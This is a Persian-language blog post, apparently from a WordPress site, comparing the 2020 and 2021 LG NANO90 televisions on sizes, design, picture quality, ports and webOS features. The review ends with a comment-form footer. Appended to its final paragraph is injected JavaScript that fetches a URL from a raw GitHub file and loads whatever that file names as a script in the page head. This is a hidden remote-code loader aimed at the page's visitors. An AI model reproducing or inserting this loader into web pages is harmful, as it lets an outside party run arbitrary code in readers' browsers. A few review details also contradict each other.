دسته‌بندی نشده

مقایسه تلویزیون ال جی NANO90 سال های 2020 و 2021

تلویزیون ال جی مدل NANO90 عرضه شده در هر دو سال 2020 و 2021 محصولاتی عالی و بسیار خوب محسوب می شوند. مدل 2021 به صورتی ارتقا یافته تر با ویژگی هایی مانند روشنایی بهتر, کوالتی بالاتر و طراحی جذاب تر عرضه شده است . مدل 2020 دارای رنج رنگی گسترده تری در محتویات HDR است. از نظر کیفیت تصاویر هر دو تلویزیون به یکدیگر نزدیک هستند و تفاوتی چندانی در ان ها مشاهده نمی شود. 

اینچ های ارائه شده

NANO90 در هر دو سال 2020 و 2021 با اینچ های مشابه و یکسان عرضه شده است. هر دو دارای چهار سایز مختلف 55 و 65 اینچ که برای سالن های نسبتا یزرگ کاربرد دارند و 75 و 58 اینچ که مناسب برای استفاده در سالن های بزرگ می باشد. 

طراحی و ساخت

NANO90 سال 2020 دارای طراحی بسیار زیبا و چشمگیر و از مدل SM9000 سال 2019 متفاوت تر ساخته شده است. این مدل بیشتر به NANO85 شباهت دارد و مانند ان در سه طرف از تلویزیون حاشیه های بسیار باریک و غیر قابل مشاهده استفاده شده است. پایه های این تلویزیون به صورتی دو شاخه طراحی شده اند بنابراین تلویزیون را به خوبی نگه می دارند. در کل طراحی این تلویزیون در سال 2020 به شیوه ای ساده با جلوه زیبا انجام شده است. قسمت جلویی مدل 2021 به مدل قدیمی تر ان شباهت دارد و همانند ان دارای حاشیه های باریک در سه طرف و پایه دو شاخه می باشد اما قسمت پشتی ان دارای طراحی ارتقا یافته و به مدل NANO99 2020 نزدیک تر است. قسمت پشتی مدل 2020 دارای جنس فلزی است و طراحی ساده ای دارد پورت ها و درگاه در قسمت کناری قرار گرفته اند و دسترسی بسیار اسانی دارند. مدل 2021 از فلز ساخته شده است و جلوه ای ساده و طراحی یکنواخت دارد. بر روی پایه ها یک قسمت تنظیم کننده کابل وجود دارد که جلوه ای مرتب تر به تلویزیون می دهد. حاشیه های هر دو مدل دارای قطر 1 سانتی متر می باشند. 

کیفیت تصویر و ویژگی های مختلف ان 

مدل NANO90 هر دو سال 2020 و 2021 محتویات فورکی 4K را بدون مشکل و کاملا بی عیب و نقص نمایش می دهد. محتویات 1080p به خوبی فورکی به نمایش در می ایند و همچنین کیفیت های 720p و 480p به بهترین صورت ممکن ارتقا داده می شوند. در مدل 2020 با وجود پنل IPS نسبت کنتراست خوب و مناسبی ارائه می شود البته مانند دیگر تلویزیون های ال جی کنتراست بین واحد های مختلف ان یکسان نیست و تفاوت های جزئی با یکدیگر دارند. در این مدل از تکنولوژی لوکال دیمینگ برای ارتقا نسبت کنتراست استفاده می شود. اگر می خواهید یک تلویزیون با نسبت کنتراست بسیار بالا داشته باشید Q70A سامسونگ می تواند گزینه کاربردی برایتان باشد. نسبت کنتراست در مدل 2020 در سطح متوسطی قرار دارد که با توجه به پنل IPS استفاده شده روی ان امری دور از انتظار نیست. از نظر زاویه دید هر دو تلویزیون عملکردی مناسب دارند اما نمی توان همانند دیگر پنل های IPS انتظار عملکردی عالی را از این مدل داشت چراکه در قسمت های حاشیه ای تصاویر تا حدی تیره تر می شوند و کیفیت اصلی خود را از دست خواهند داد. هر دو مدل 2021 و 2020 بر روی انعکاس نور کنترلی عالی دارند بنابراین می توان به اسانی از ان ها در اتاق های بسیار روشن و حتی در معرض تابش مستقیم نور قرار داد. 

درگاه های ارتباطی و پورت ها 

در تلویزیون ها برای ایجاد ارتباط بین ان ها و دستگاه های مختلف از قسمت هایی با عنوان پورت و یا درگاه های ارتباطی استفاده می شود که اغلب بر روی قسمت پشتی و یا قسمت های کناری تعبیه می شوند. این ورودی ها با استفاده از سیم های مخصوص ارتباط بین تلویزیون و دستگاه هایی مانند ساندبار و یا کنسول های بازی را ایجاد می کنند  باعث ایجاد سرگرمی های متنوع برای افراد می شوند. بر روی هر دو مدل به صورت یکسان از 4 درگاه HDMI و 3 درگاه USB استفاده شده است. خروجی اپتیکال در هر دو مدل 1 عدد است و پورت های انترنت و تیونر نیز به میزان 1 عدد روی ان ها تعبیه شده است. در مدل 2020 1 عدد درگاه کامپوزیت نیز وجود دارد که در NANO90 2020 مشاهده نمی شود. 

قابلیت های هوشمند

درتلویزیون های NANO90 سال 2020 و 2021 از سیستم عامل مخصوص کمپانی ال جی WebOS استفاده شده است. در مدل 2020 نسخه 5.0 و در مدل 2021 نسخه 6.0 از این پلتفرم نصب شده است هر دو ان ها کارکردی اسان و روان دارند و با تعداد بسیار زیاد و گسترده ای از اپلیکیشن های ارائه شده اند. ریموت کنترل عرضه شده همراه این دو تلویزیون دارای اندازه بزرگ و قابلیت و ویژگی های مختلفی می باشند. در مدل 2020 از ریموت کنترل جادویی استفاده شده است. کاربرد این ریموت از مدل های معمولی بسیار اسان تر است. در این ریموت از میانبر هایی برای دسترسی سریع به امازون و نتفلیکس استفاده شده است. با این ریموت کنترل می توانید به اسانی با استفاده از صدا خود دستورات صوتی مختلف را انجام دهید و تنظیمات مختلف را روی تلویزیون اعمال کنید. در مدل 2021 این تلویزیون از ریموت کنترل اپدیت شده ان استفاده شده است. با این ریموت کنترل جادویی دسترسی سریع به برنامه های مختلفی از جمله امازون و نتفلیکس و اپ استور وجود دارد. با استفاده از میکروفون توکار در این مدل می توانید به اسانی با استفاده از دستیار های صوتی گوگل و الکسا دستورات صوتی را اعمال کنید و در میان اپلیکیشن های مختلف جستجو کنید.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *